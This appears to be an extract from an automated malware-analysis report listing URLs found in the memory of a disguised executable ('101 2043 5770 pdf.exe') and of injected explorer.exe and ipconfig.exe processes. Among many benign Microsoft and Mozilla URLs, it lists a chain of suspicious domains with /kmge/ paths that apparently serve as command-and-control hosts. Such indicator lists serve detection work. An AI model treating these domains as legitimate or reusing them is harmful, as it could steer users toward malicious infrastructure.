Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hhe-crv220.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyz/kmge/www.bedbillionaire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.icvp5o.xyzReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com/kmge/www.cq0jt.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com/kmge/www.kickssoccercamp.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz/kmge/www.landfillequip.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyzReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com/kmge/www.szexvideokingyen.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.storeReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com/kmge/www.n5l780.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603845014.0000000010B09000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4594200448.0000000003DD9000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603845014.0000000010B09000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4594200448.0000000003DD9000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com/kmge/www.sejasuapropriachefe.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs/kmge/www.agritamaperkasaindonesia.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbsReferer:
Source: explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: 101 2043 5770 pdf.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: 101 2043 5770 pdf.exe, 00000019.00000002.2357342046.00007FF6802A2000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: explorer.exe, 00000007.00000000.2149784147.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ipconfig.exe, 00000009.00000003.2215032606.0000000006088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000007.00000000.2149784147.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4601846350.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000007.00000002.4595914565.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
